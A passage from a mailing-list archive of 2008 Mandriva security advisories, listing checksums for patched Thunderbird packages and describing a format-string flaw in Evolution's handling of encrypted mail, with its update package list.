2007.1/x86_64/mozilla-thunderbird-enigmail-ru-2.0.0.12-1mdv2007.1.x86_64.rpm 863b619dcba5d85216d461f99e9a648d 2007.1/x86_64/mozilla-thunderbird-enigmail-sk-2.0.0.12-1mdv2007.1.x86_64.rpm 73aedf6e41879713f182bb49031f73c6 2007.1/x86_64/mozilla-thunderbird-enigmail-sl-2.0.0.12-1mdv2007.1.x86_64.rpm 37a5cc52415d508a43b608821438274e 2007.1/x86_64/mozilla-thunderbird-enigmail-sv-2.0.0.12-1mdv2007.1.x86_64.rpm d92b03367b0ff280e37337b715ab2e93 2007.1/x86_64/mozilla-thunderbird-enigmail-tr-2.0.0.12-1mdv2007.1.x86_64.rpm e5cbc41ab18a2cb52c178e19cacb5819 2007.1/x86_64/mozilla-thunderbird-enigmail-zh_CN-2.0.0.12-1mdv2007.1.x86_64.rpm 7d7e54fd172017c2b1cacd48aa77dc51 2007.1/x86_64/mozilla-thunderbird-enigmail-zh_TW-2.0.0.12-1mdv2007.1.x86_64.rpm 11eb43d3b45db947e96ee79f23f3a526 2007.1/x86_64/mozilla-thunderbird-es_AR-2.0.0.12-1mdv2007.1.x86_64.rpm e49491ec0f7da1c62d2f982f4ef4b247 2007.1/x86_64/mozilla-thunderbird-es_ES-2.0.0.12-1mdv2007.1.x86_64.rpm 001b093a9b19633cbe88133108f70fe2 2007.1/x86_64/mozilla-thunderbird-et_EE-2.0.0.12-1mdv2007.1.x86_64.rpm 9a971fc149f766e92dfe1ab7a4802dea 2007.1/x86_64/mozilla-thunderbird-eu-2.0.0.12-1mdv2007.1.x86_64.rpm 88dc614ab7f512a149a41cad03a01dc8 2007.1/x86_64/mozilla-thunderbird-fi-2.0.0.12-1mdv2007.1.x86_64.rpm 702b9b1d1f58822801cd09b59ab99461 2007.1/x86_64/mozilla-thunderbird-fr-2.0.0.12-1mdv2007.1.x86_64.rpm 47de1d018e7506e8d12d9376e36070a6 2007.1/x86_64/mozilla-thunderbird-gu_IN-2.0.0.12-1mdv2007.1.x86_64.rpm ca417ed06d289fd2466a0f29885cf3d9 2007.1/x86_64/mozilla-thunderbird-he-2.0.0.12-1mdv2007.1.x86_64.rpm b33f0bb25237f42723b93bd7003d5bfb 2007.1/x86_64/mozilla-thunderbird-hu-2.0.0.12-1mdv2007.1.x86_64.rpm 93eb746bf9d26794fe56018f04118022 2007.1/x86_64/mozilla-thunderbird-it-2.0.0.12-1mdv2007.1.x86_64.rpm 9cd2c298f097696801b3c85a1f16c4b8 2007.1/x86_64/mozilla-thunderbird-ja-2.0.0.12-1mdv2007.1.x86_64.rpm 860fb32c3394d1dd9b28bf04dbdb7e15 2007.1/x86_64/mozilla-thunderbird-ko-2.0.0.12-1mdv2007.1.x86_64.rpm 8d57841e92887ca7880fae171107043a 2007.1/x86_64/mozilla-thunderbird-lt-2.0.0.12-1mdv2007.1.x86_64.rpm 062fbc3da2f189c9cd5d4cb8107f9fcc 2007.1/x86_64/mozilla-thunderbird-mk-2.0.0.12-1mdv2007.1.x86_64.rpm 51e0465e605689c52b7a5a134565a024 2007.1/x86_64/mozilla-thunderbird-nb_NO-2.0.0.12-1mdv2007.1.x86_64.rpm df21f4748e30db12494f572619dc5962 2007.1/x86_64/mozilla-thunderbird-nl-2.0.0.12-1mdv2007.1.x86_64.rpm e2545092b2b0eb6aeb6635b11eac4390 2007.1/x86_64/mozilla-thunderbird-nn_NO-2.0.0.12-1mdv2007.1.x86_64.rpm af27d1a69b53f807a4c408cb892951da 2007.1/x86_64/mozilla-thunderbird-pa_IN-2.0.0.12-1mdv2007.1.x86_64.rpm 69d9de5d47ecdae0bd41522dfe7b59e6 2007.1/x86_64/mozilla-thunderbird-pl-2.0.0.12-1mdv2007.1.x86_64.rpm 8f90d3d49beed5e38b2d851a0e063dee 2007.1/x86_64/mozilla-thunderbird-pt_BR-2.0.0.12-1mdv2007.1.x86_64.rpm 828e605bd1d3a22c4528d2b4f4f41007 2007.1/x86_64/mozilla-thunderbird-pt_PT-2.0.0.12-1mdv2007.1.x86_64.rpm e8ec0cb268efca93dcf4a5d2f0042127 2007.1/x86_64/mozilla-thunderbird-ru-2.0.0.12-1mdv2007.1.x86_64.rpm bfb35c0605cf6bb437b841a9b261abb1 2007.1/x86_64/mozilla-thunderbird-sk-2.0.0.12-1mdv2007.1.x86_64.rpm fbedb5cc3483e4bb6d6aa1645e03ac7a 2007.1/x86_64/mozilla-thunderbird-sl-2.0.0.12-1mdv2007.1.x86_64.rpm 0961b5611a78c08a4bca97e7298d89bd 2007.1/x86_64/mozilla-thunderbird-sv_SE-2.0.0.12-1mdv2007.1.x86_64.rpm 1f66692be8150b9dcfb74dc11ed8bb5e 2007.1/x86_64/mozilla-thunderbird-tr-2.0.0.12-1mdv2007.1.x86_64.rpm b4e291926b5cc7fb56b9dd1a90f945c5 2007.1/x86_64/mozilla-thunderbird-zh_CN-2.0.0.12-1mdv2007.1.x86_64.rpm 8e2dc271d133b8a71370c937610bc7c7 2007.1/x86_64/mozilla-thunderbird-zh_TW-2.0.0.12-1mdv2007.1.x86_64.rpm 3361b53c90db34e12338fa7b30e72a6a 2007.1/x86_64/nsinstall-2.0.0.12-3mdv2007.1.x86_64.rpm 7994829adbfce99c9bd19486f086018c 2007.1/SRPMS/mozilla-thunderbird-2.0.0.12-3mdv2007.1.src.rpm 7bb65b8f41d245343e53864a59222c73 2007.1/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.12-1mdv2007.1.src.rpm 4b3d16efe6d41659c8c45043e8280d9c 2007.1/SRPMS/mozilla-thunderbird-l10n-2.0.0.12-1mdv2007.1.src.rpm Mandriva Linux 2008.0: 7e413fc33fdf50f547172f7dc86bd9ff 2008.0/i586/mozilla-thunderbird-2.0.0.12-3mdv2008.0.i586.rpm ca553ea39a98583a3cd02bdef6799f70 2008.0/i586/mozilla-thunderbird-be-2.0.0.12-1mdv2008.0.i586.rpm fb4bfeb126943da58bf677d35105b843 2008.0/i586/mozilla-thunderbird-bg-2.0.0.12-1mdv2008.0.i586.rpm b5bd35ef6dc918653f809e07f0c22e09 2008.0/i586/mozilla-thunderbird-ca-2.0.0.12-1mdv2008.0.i586.rpm e094e128b6799f1b27180bdb9eba3ac4 2008.0/i586/mozilla-thunderbird-cs-2.0.0.12-1mdv2008.0.i586.rpm a0e206f52d5629326bed5a582ca121ec 2008.0/i586/mozilla-thunderbird-da-2.0.0.12-1mdv2008.0.i586.rpm 1c154b7b875fdd5ba0a91c30cc6c5a11 2008.0/i586/mozilla-thunderbird-de-2.0.0.12-1mdv2008.0.i586.rpm 97400bad0df92f556965768f7f9fbacb 2008.0/i586/mozilla-thunderbird-devel-2.0.0.12-3mdv2008.0.i586.rpm d74164ed197938643dcb648b76049e99 2008.0/i586/mozilla-thunderbird-el-2.0.0.12-1mdv2008.0.i586.rpm 76416369c4ef412e04ea937715a3810d 2008.0/i586/mozilla-thunderbird-en_GB-2.0.0.12-1mdv2008.0.i586.rpm c3241440673656224460c102f5c556d2 2008.0/i586/mozilla-thunderbird-enigmail-2.0.0.12-3mdv2008.0.i586.rpm fade8de3b7efac6a54d8f0f499f838de 2008.0/i586/mozilla-thunderbird-enigmail-ca-2.0.0.12-1mdv2008.0.i586.rpm 6d2de5d59d98c33af1841daa1b4787f3 2008.0/i586/mozilla-thunderbird-enigmail-cs-2.0.0.12-1mdv2008.0.i586.rpm 821fa427f5f92b11a21a4397798efdb4 2008.0/i586/mozilla-thunderbird-enigmail-de-2.0.0.12-1mdv2008.0.i586.rpm 53f2b2b90c773db98186560e2b660d3a 2008.0/i586/mozilla-thunderbird-enigmail-el-2.0.0.12-1mdv2008.0.i586.rpm 2409ab6c8d2000cf16b6394772edff05 2008.0/i586/mozilla-thunderbird-enigmail-es-2.0.0.12-1mdv2008.0.i586.rpm 7839eabdd8884587dbe6546495c2764f 2008.0/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.12-1mdv2008.0.i586.rpm 3ff14f6709db8363e4f209ea8b3c782a 2008.0/i586/mozilla-thunderbird-enigmail-fi-2.0.0.12-1mdv2008.0.i586.rpm a05a6413cbc9d3f83e5af365696bddc3 2008.0/i586/mozilla-thunderbird-enigmail-fr-2.0.0.12-1mdv2008.0.i586.rpm 59105e2565910f5ee46e3c6ae43e385d 2008.0/i586/mozilla-thunderbird-enigmail-hu-2.0.0.12-1mdv2008.0.i586.rpm 7e1f18fc17b2abae6093fa5b5b865bc3 2008.0/i586/mozilla-thunderbird-enigmail-it-2.0.0.12-1mdv2008.0.i586.rpm c357acb65692fc330f8353f5f893aab8 2008.0/i586/mozilla-thunderbird-enigmail-ja-2.0.0.12-1mdv2008.0.i586.rpm 93223c4d7e06d8458c692916ba0a0f22 2008.0/i586/mozilla-thunderbird-enigmail-ko-2.0.0.12-1mdv2008.0.i586.rpm e0329a9d3e8f526f281970f53e26288d 2008.0/i586/mozilla-thunderbird-enigmail-nb-2.0.0.12-1mdv2008.0.i586.rpm f82ce5aa1c860486b8443dace218e007 2008.0/i586/mozilla-thunderbird-enigmail-nl-2.0.0.12-1mdv2008.0.i586.rpm d89654119e6d4e7527d6eb9b974bc2fb 2008.0/i586/mozilla-thunderbird-enigmail-pl-2.0.0.12-1mdv2008.0.i586.rpm df2cce2c33483906ef8df615407bddd9 2008.0/i586/mozilla-thunderbird-enigmail-pt-2.0.0.12-1mdv2008.0.i586.rpm 2c9163e0eaec1a6af39fc75a2a50d618 2008.0/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.12-1mdv2008.0.i586.rpm 8a76eed27b19092e02b896ab3f447a82 2008.0/i586/mozilla-thunderbird-enigmail-ro-2.0.0.12-1mdv2008.0.i586.rpm 0ad75daab8aafaa66d78e95c932d255e 2008.0/i586/mozilla-thunderbird-enigmail-ru-2.0.0.12-1mdv2008.0.i586.rpm 0dee2c95d6455fa2cdf2e382aebfcef8 2008.0/i586/mozilla-thunderbird-enigmail-sk-2.0.0.12-1mdv2008.0.i586.rpm 02f1f0f4e4097449c72fd9c69bbe26f4 2008.0/i586/mozilla-thunderbird-enigmail-sl-2.0.0.12-1mdv2008.0.i586.rpm 0b614b401642e7b780957541190d4800 2008.0/i586/mozilla-thunderbird-enigmail-sv-2.0.0.12-1mdv2008.0.i586.rpm 71de000b22726c59aaddd2494ec9284b 2008.0/i586/mozilla-thunderbird-enigmail-tr-2.0.0.12-1mdv2008.0.i586.rpm 9d3b33f10a46cbfd773bef15d285e53b 2008.0/i586/mozilla-thunderbird-enigmail-zh_CN-2.0.0.12-1mdv2008.0.i586.rpm c8a40b8e286bada49815c5c10dc0d16a 2008.0/i586/mozilla-thunderbird-enigmail-zh_TW-2.0.0.12-1mdv2008.0.i586.rpm 9717ff025358e60598d52383619d232d 2008.0/i586/mozilla-thunderbird-es_AR-2.0.0.12-1mdv2008.0.i586.rpm 4d61b069c9a2af9f7b234cdd9bc500b6 2008.0/i586/mozilla-thunderbird-es_ES-2.0.0.12-1mdv2008.0.i586.rpm 96cc7f0953e105c86b9a5ecde0d0ef4b 2008.0/i586/mozilla-thunderbird-et_EE-2.0.0.12-1mdv2008.0.i586.rpm e3094c943d30f8c823d650b41c59249e 2008.0/i586/mozilla-thunderbird-eu-2.0.0.12-1mdv2008.0.i586.rpm f3a4e20871dc89ad3a2c4278fc145ffd 2008.0/i586/mozilla-thunderbird-fi-2.0.0.12-1mdv2008.0.i586.rpm 9fd804e5ddc2a97fe02418d291848635 2008.0/i586/mozilla-thunderbird-fr-2.0.0.12-1mdv2008.0.i586.rpm 168ae341dc518cc28ab2cbcd165d65cc 2008.0/i586/mozilla-thunderbird-gu_IN-2.0.0.12-1mdv2008.0.i586.rpm 7c7724b418b41063c5300b1dbb1abd16 2008.0/i586/mozilla-thunderbird-he-2.0.0.12-1mdv2008.0.i586.rpm fc74066ce3dac64a05936b1c8327ae03 2008.0/i586/mozilla-thunderbird-hu-2.0.0.12-1mdv2008.0.i586.rpm a3474e3261f7cde15426eff8a700a457 2008.0/i586/mozilla-thunderbird-it-2.0.0.12-1mdv2008.0.i586.rpm 2690f07b271b01b1e8954d7a4b89a502 2008.0/i586/mozilla-thunderbird-ja-2.0.0.12-1mdv2008.0.i586.rpm 4c886be9746081c21b6d942b0b6c3e8a 2008.0/i586/mozilla-thunderbird-ko-2.0.0.12-1mdv2008.0.i586.rpm 865fdee44d540e7535d5155c1ce6f70f 2008.0/i586/mozilla-thunderbird-lt-2.0.0.12-1mdv2008.0.i586.rpm c60cba375b07d6e4e61762f330f1cc17 2008.0/i586/mozilla-thunderbird-mk-2.0.0.12-1mdv2008.0.i586.rpm ddfaa6ccf729b85a13bbff53123f5500 2008.0/i586/mozilla-thunderbird-moztraybiff-1.2.3-4mdv2008.0.i586.rpm 7edcc56a70abe1cb80048086ad58d832 2008.0/i586/mozilla-thunderbird-nb_NO-2.0.0.12-1mdv2008.0.i586.rpm ad7fd0e7b61eef63a377fe99b130e9d1 2008.0/i586/mozilla-thunderbird-nl-2.0.0.12-1mdv2008.0.i586.rpm d8d8633b92971649ecd3d9c58b16606a 2008.0/i586/mozilla-thunderbird-nn_NO-2.0.0.12-1mdv2008.0.i586.rpm b2d8fadf40674326c0083006327737b2 2008.0/i586/mozilla-thunderbird-pa_IN-2.0.0.12-1mdv2008.0.i586.rpm 23668ebd267a040105d7fb06b4dccdee 2008.0/i586/mozilla-thunderbird-pl-2.0.0.12-1mdv2008.0.i586.rpm bf7b31283f51eefb8de3d6028639fb01 2008.0/i586/mozilla-thunderbird-pt_BR-2.0.0.12-1mdv2008.0.i586.rpm 7d07151b6eec12a6cbb5a785d807a35e 2008.0/i586/mozilla-thunderbird-pt_PT-2.0.0.12-1mdv2008.0.i586.rpm 2e4205ccca23d4b4b390a7ece48119dc 2008.0/i586/mozilla-thunderbird-ru-2.0.0.12-1mdv2008.0.i586.rpm 6b028d2b00fcd302fe4b2bb3be55cf0b 2008.0/i586/mozilla-thunderbird-sk-2.0.0.12-1mdv2008.0.i586.rpm 59415d3d4b769e826ed8e7dc5d730a2d 2008.0/i586/mozilla-thunderbird-sl-2.0.0.12-1mdv2008.0.i586.rpm 35a7f5c8f5fd6dbb9161ac63e9b0a32d 2008.0/i586/mozilla-thunderbird-sv_SE-2.0.0.12-1mdv2008.0.i586.rpm 5aa9236d1e735ad1612ac13e3a52beb1 2008.0/i586/mozilla-thunderbird-tr-2.0.0.12-1mdv2008.0.i586.rpm 0a397bf3092e80305eb89c83204e766e 2008.0/i586/mozilla-thunderbird-zh_CN-2.0.0.12-1mdv2008.0.i586.rpm fb6ab92855f022d34bc323bbcf5ac54d 2008.0/i586/mozilla-thunderbird-zh_TW-2.0.0.12-1mdv2008.0.i586.rpm ec13431053abe327341e37749e5799e8 2008.0/i586/nsinstall-2.0.0.12-3mdv2008.0.i586.rpm 78ce807267f62f0e3b62ed88f6df28e4 2008.0/SRPMS/mozilla-thunderbird-2.0.0.12-3mdv2008.0.src.rpm d84af81f2b8c08891e104ba20328dc2e 2008.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.12-1mdv2008.0.src.rpm 98b203925525d0b6aaf6cb72b287d95c 2008.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.12-1mdv2008.0.src.rpm 391ff5f59e47982bd5902e334f263405 2008.0/SRPMS/mozilla-thunderbird-moztraybiff-1.2.3-4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: eb08abdcd75cd561472dabccf8377f35 2008.0/x86_64/mozilla-thunderbird-2.0.0.12-3mdv2008.0.x86_64.rpm b8ca1680f635f9023d0ee08b25a89217 2008.0/x86_64/mozilla-thunderbird-be-2.0.0.12-1mdv2008.0.x86_64.rpm 46b3ee54068dc2ea4c860ab2dc1583ba 2008.0/x86_64/mozilla-thunderbird-bg-2.0.0.12-1mdv2008.0.x86_64.rpm fb2aee3cf8f3020c72ca4caa87a10349 2008.0/x86_64/mozilla-thunderbird-ca-2.0.0.12-1mdv2008.0.x86_64.rpm 940142439c86d8a20c081a7499d537a0 2008.0/x86_64/mozilla-thunderbird-cs-2.0.0.12-1mdv2008.0.x86_64.rpm 4e48dc642527e683e66a312b60f54b96 2008.0/x86_64/mozilla-thunderbird-da-2.0.0.12-1mdv2008.0.x86_64.rpm 392b702ed54982beb24fc7e2f29dcc97 2008.0/x86_64/mozilla-thunderbird-de-2.0.0.12-1mdv2008.0.x86_64.rpm 30c0805aa83b4cede4461201269b858a 2008.0/x86_64/mozilla-thunderbird-devel-2.0.0.12-3mdv2008.0.x86_64.rpm f614cb044de62a58f09f3ffd6b474134 2008.0/x86_64/mozilla-thunderbird-el-2.0.0.12-1mdv2008.0.x86_64.rpm 2141a96e988b0d1a964b9a923c39fb47 2008.0/x86_64/mozilla-thunderbird-en_GB-2.0.0.12-1mdv2008.0.x86_64.rpm 3cb623d0cbf574e04733ac8c91e67765 2008.0/x86_64/mozilla-thunderbird-enigmail-2.0.0.12-3mdv2008.0.x86_64.rpm 11510f9e1af130bb1278e8627c8dd120 2008.0/x86_64/mozilla-thunderbird-enigmail-ca-2.0.0.12-1mdv2008.0.x86_64.rpm 6d82e1c9c7f0ec4fe6379f567e07e657 2008.0/x86_64/mozilla-thunderbird-enigmail-cs-2.0.0.12-1mdv2008.0.x86_64.rpm 34605d756a70f6e6474bef33109ab724 2008.0/x86_64/mozilla-thunderbird-enigmail-de-2.0.0.12-1mdv2008.0.x86_64.rpm 1ef9f0bc9d8e32c16225bccfbce70d0b 2008.0/x86_64/mozilla-thunderbird-enigmail-el-2.0.0.12-1mdv2008.0.x86_64.rpm 3db07995c00c3730ba261a0ba2050d18 2008.0/x86_64/mozilla-thunderbird-enigmail-es-2.0.0.12-1mdv2008.0.x86_64.rpm 98244d01f46e6149027b80041fd94488 2008.0/x86_64/mozilla-thunderbird-enigmail-es_AR-2.0.0.12-1mdv2008.0.x86_64.rpm 670a69bade2b15e7e1bc0c0140c21ec9 2008.0/x86_64/mozilla-thunderbird-enigmail-fi-2.0.0.12-1mdv2008.0.x86_64.rpm a7d505eb3926a2493b21b0fd167d9f29 2008.0/x86_64/mozilla-thunderbird-enigmail-fr-2.0.0.12-1mdv2008.0.x86_64.rpm abf8cf1f16c5d7ef5488f0836c8d055a 2008.0/x86_64/mozilla-thunderbird-enigmail-hu-2.0.0.12-1mdv2008.0.x86_64.rpm 4c685f3d3853f0e410e4004938c0e0e2 2008.0/x86_64/mozilla-thunderbird-enigmail-it-2.0.0.12-1mdv2008.0.x86_64.rpm 6a5a276340de9ea6dd481cdf38d88fee 2008.0/x86_64/mozilla-thunderbird-enigmail-ja-2.0.0.12-1mdv2008.0.x86_64.rpm 70391da4b107c8fa8fd021d23ecc7bc3 2008.0/x86_64/mozilla-thunderbird-enigmail-ko-2.0.0.12-1mdv2008.0.x86_64.rpm 144853b172b2a4a90274be16ed8dce3b 2008.0/x86_64/mozilla-thunderbird-enigmail-nb-2.0.0.12-1mdv2008.0.x86_64.rpm 5a41b33f95b4414ebaf5b0b8ab00cf22 2008.0/x86_64/mozilla-thunderbird-enigmail-nl-2.0.0.12-1mdv2008.0.x86_64.rpm 3fb44a4c49bde788dfbce5f15d668e37 2008.0/x86_64/mozilla-thunderbird-enigmail-pl-2.0.0.12-1mdv2008.0.x86_64.rpm e3df9079108ab12e6b82ad96479fc28e 2008.0/x86_64/mozilla-thunderbird-enigmail-pt-2.0.0.12-1mdv2008.0.x86_64.rpm e0ee764bbfd75b3c3e35b8ce957a4225 2008.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-2.0.0.12-1mdv2008.0.x86_64.rpm e760b3f0899c8095e86a6fad8cf20fba 2008.0/x86_64/mozilla-thunderbird-enigmail-ro-2.0.0.12-1mdv2008.0.x86_64.rpm 2917e443bd210962f84176fb1e203187 2008.0/x86_64/mozilla-thunderbird-enigmail-ru-2.0.0.12-1mdv2008.0.x86_64.rpm f18d5659fbc21f1e91a04018cfb7381b 2008.0/x86_64/mozilla-thunderbird-enigmail-sk-2.0.0.12-1mdv2008.0.x86_64.rpm 220fdf154ccdaf3d9efd5eefafc51b20 2008.0/x86_64/mozilla-thunderbird-enigmail-sl-2.0.0.12-1mdv2008.0.x86_64.rpm ad88d7ec6441e9e999c69dd6680953d8 2008.0/x86_64/mozilla-thunderbird-enigmail-sv-2.0.0.12-1mdv2008.0.x86_64.rpm 18c13a56159a255922f24ae9f5221e2b 2008.0/x86_64/mozilla-thunderbird-enigmail-tr-2.0.0.12-1mdv2008.0.x86_64.rpm 2ae5c55a6157cee2fb29b907c1be9185 2008.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-2.0.0.12-1mdv2008.0.x86_64.rpm 1ae46a58116bea5b51a08f99780f053d 2008.0/x86_64/mozilla-thunderbird-enigmail-zh_TW-2.0.0.12-1mdv2008.0.x86_64.rpm 6c93528f7b2bdc82e63eddf26e1ea097 2008.0/x86_64/mozilla-thunderbird-es_AR-2.0.0.12-1mdv2008.0.x86_64.rpm c71f0feb4a804fdb2ec5b8ce655a3790 2008.0/x86_64/mozilla-thunderbird-es_ES-2.0.0.12-1mdv2008.0.x86_64.rpm 70d8224621fd77ee5956bdc982a4a81e 2008.0/x86_64/mozilla-thunderbird-et_EE-2.0.0.12-1mdv2008.0.x86_64.rpm dc946f0e356c9d9c34ec50bd30017f6a 2008.0/x86_64/mozilla-thunderbird-eu-2.0.0.12-1mdv2008.0.x86_64.rpm 7cd9d9fa9ad9c63f0125c54ceeba7736 2008.0/x86_64/mozilla-thunderbird-fi-2.0.0.12-1mdv2008.0.x86_64.rpm 8d74d4f265575da7019b548bec64b850 2008.0/x86_64/mozilla-thunderbird-fr-2.0.0.12-1mdv2008.0.x86_64.rpm dcb3b625cc1219ec49703cfdc6d23910 2008.0/x86_64/mozilla-thunderbird-gu_IN-2.0.0.12-1mdv2008.0.x86_64.rpm 483c99f3894940e02821745aa9e9cb4f 2008.0/x86_64/mozilla-thunderbird-he-2.0.0.12-1mdv2008.0.x86_64.rpm 7df99f09494bf15998b0d673be72db15 2008.0/x86_64/mozilla-thunderbird-hu-2.0.0.12-1mdv2008.0.x86_64.rpm 109aa2bd22e3771ff2dcc0dcc0adabe9 2008.0/x86_64/mozilla-thunderbird-it-2.0.0.12-1mdv2008.0.x86_64.rpm b41ea6b671d326c73e8d2f272613c7ec 2008.0/x86_64/mozilla-thunderbird-ja-2.0.0.12-1mdv2008.0.x86_64.rpm 84e76ca77c7a76d6a23634cb1532e9b9 2008.0/x86_64/mozilla-thunderbird-ko-2.0.0.12-1mdv2008.0.x86_64.rpm 491b4973889fe0591c1957a895f5812e 2008.0/x86_64/mozilla-thunderbird-lt-2.0.0.12-1mdv2008.0.x86_64.rpm 966582cc0a31ce035a79923c7534a452 2008.0/x86_64/mozilla-thunderbird-mk-2.0.0.12-1mdv2008.0.x86_64.rpm ad62b8a56a1e2610a938324a33d46276 2008.0/x86_64/mozilla-thunderbird-moztraybiff-1.2.3-4mdv2008.0.x86_64.rpm 2617e0ed1c8f524b5bee7a78b21357df 2008.0/x86_64/mozilla-thunderbird-nb_NO-2.0.0.12-1mdv2008.0.x86_64.rpm d6cdfa7d37e9b80c5360683980488af5 2008.0/x86_64/mozilla-thunderbird-nl-2.0.0.12-1mdv2008.0.x86_64.rpm 75ae2f0b17c267c6575793db0bf332c0 2008.0/x86_64/mozilla-thunderbird-nn_NO-2.0.0.12-1mdv2008.0.x86_64.rpm 080c54bcdc467d6f9044386d061bac5c 2008.0/x86_64/mozilla-thunderbird-pa_IN-2.0.0.12-1mdv2008.0.x86_64.rpm 7e1826af0000ac6b50c3ffcbb0084d7b 2008.0/x86_64/mozilla-thunderbird-pl-2.0.0.12-1mdv2008.0.x86_64.rpm de564601490c8589fd3d888476a2104f 2008.0/x86_64/mozilla-thunderbird-pt_BR-2.0.0.12-1mdv2008.0.x86_64.rpm d064e998350d02d6ece29899ae38df58 2008.0/x86_64/mozilla-thunderbird-pt_PT-2.0.0.12-1mdv2008.0.x86_64.rpm 9e8f33b780294ab307a41aac845931c8 2008.0/x86_64/mozilla-thunderbird-ru-2.0.0.12-1mdv2008.0.x86_64.rpm 9e882027464f818dbcf7f5494e036a5e 2008.0/x86_64/mozilla-thunderbird-sk-2.0.0.12-1mdv2008.0.x86_64.rpm 5bb1a407b6c8cde72cdcb68d491a1fca 2008.0/x86_64/mozilla-thunderbird-sl-2.0.0.12-1mdv2008.0.x86_64.rpm ca98127a1ea29e0f228bf735c5f7fbdf 2008.0/x86_64/mozilla-thunderbird-sv_SE-2.0.0.12-1mdv2008.0.x86_64.rpm 9f5eebad8042d5aa066291decadebc09 2008.0/x86_64/mozilla-thunderbird-tr-2.0.0.12-1mdv2008.0.x86_64.rpm aa7791c9623c83fa2aa68374d5823d2d 2008.0/x86_64/mozilla-thunderbird-zh_CN-2.0.0.12-1mdv2008.0.x86_64.rpm 7d6abfb8295a0891edd8af639c6726ab 2008.0/x86_64/mozilla-thunderbird-zh_TW-2.0.0.12-1mdv2008.0.x86_64.rpm 2b12bc7459afaa5c54b5c944d9dbaf67 2008.0/x86_64/nsinstall-2.0.0.12-3mdv2008.0.x86_64.rpm 78ce807267f62f0e3b62ed88f6df28e4 2008.0/SRPMS/mozilla-thunderbird-2.0.0.12-3mdv2008.0.src.rpm d84af81f2b8c08891e104ba20328dc2e 2008.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.12-1mdv2008.0.src.rpm 98b203925525d0b6aaf6cb72b287d95c 2008.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.12-1mdv2008.0.src.rpm 391ff5f59e47982bd5902e334f263405 2008.0/SRPMS/mozilla-thunderbird-moztraybiff-1.2.3-4mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFH0HRumqjQ0CJFipgRAlKkAKCCb+ioyrGdeGj2/4V49ANnBa405wCfXDYU 3NU5/COnqPpS7+vYk2NPmRQ= =lIL7 -----END PGP SIGNATURE----- From security at mandriva.com Fri Mar 7 02:42:37 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 06 Mar 2008 19:42:37 -0700 Subject: [Full-disclosure] [ MDVSA-2008:063 ] - Updated Evolution packages fix critical vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:063 http://www.mandriva.com/security/ _______________________________________________________________________ Package : evolution Date : March 6, 2008 Affected: 2007.1, 2008.0 _______________________________________________________________________ Problem Description: Ulf Harnhammar of Secunia Research discovered a format string flaw in how Evolution displayed encrypted mail content. If a user were to open a carefully crafted email message, arbitrary code could be executed with the permissions of the user running Evolution. The updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0072 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 4e8e24994ce1f37d7fa2b40b93cb7767 2007.1/i586/evolution-2.10.2-2.2mdv2007.1.i586.rpm 7d2a80c1c7f506f064d2e05895b67b0d 2007.1/i586/evolution-devel-2.10.2-2.2mdv2007.1.i586.rpm 0a80f0dd31179d99747c4c851e2ed8a9 2007.1/i586/evolution-mono-2.10.2-2.2mdv2007.1.i586.rpm 4bd7556907014b0e047c30ce43484caf 2007.1/i586/evolution-pilot-2.10.2-2.2mdv2007.1.i586.rpm 826717f3fea97f934eb6a596f67edd96 2007.1/SRPMS/evolution-2.10.2-2.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 0951f21569c57a2c3975c5df7f5f2074 2007.1/x86_64/evolution-2.10.2-2.2mdv2007.1.x86_64.rpm 8b0cef17cde0851a5fe626881b71c09a 2007.1/x86_64/evolution-devel-2.10.2-2.2mdv2007.1.x86_64.rpm 43a889af38f11b34dc503f51de9f4921 2007.1/x86_64/evolution-mono-2.10.2-2.2mdv2007.1.x86_64.rpm 7586926d4809c66fc8bbd656be2a64fc 2007.1/x86_64/evolution-pilot-2.10.2-2.2mdv2007.1.x86_64.rpm 826717f3fea97f934eb6a596f67edd96 2007.1/SRPMS/evolution-2.10.2-2.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 848621169e649c76a118adc78bbeb437 2008.0/i586/evolution-2.12.3-1.2mdv2008.0.i586.rpm 0034c11598d908c5a94cb637b255a2c9 2008.0/i586/evolution-devel-2.12.3-1.2mdv2008.0.i586.rpm 526f6dff8ed0501d4d685caa7dbd0a11 2008.0/i586/evolution-mono-2.12.3-1.2mdv2008.0.i586.rpm ae736c07e20a46a99b03c81a7047b440 2008.0/i586/evolution-pilot-2.12.3-1.2mdv2008.0.i586.rpm bf7431bd51a057d8ef5a80d541ad8de1 2008.0/SRPMS/evolution-2.12.3-1.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d3c4fd1d66dc8dec3a318cab203fc393 2008.0/x86_64/evolution-2.12.3-1.2mdv2008.0.x86_64.rpm 5130831a0fd1c5d6a07f12fc8c5f68ff 2008.0/x86_64/evolution-devel-2.12.3-1.2mdv2008.0.x86_64.rpm 96c34cd8fe5f4981e788f72e4038812a 2008.0/x86_64/evolution-mono-2.12.3-1.2mdv2008.0.x86_64.rpm 126ff5b8d697970652cfa365926556df 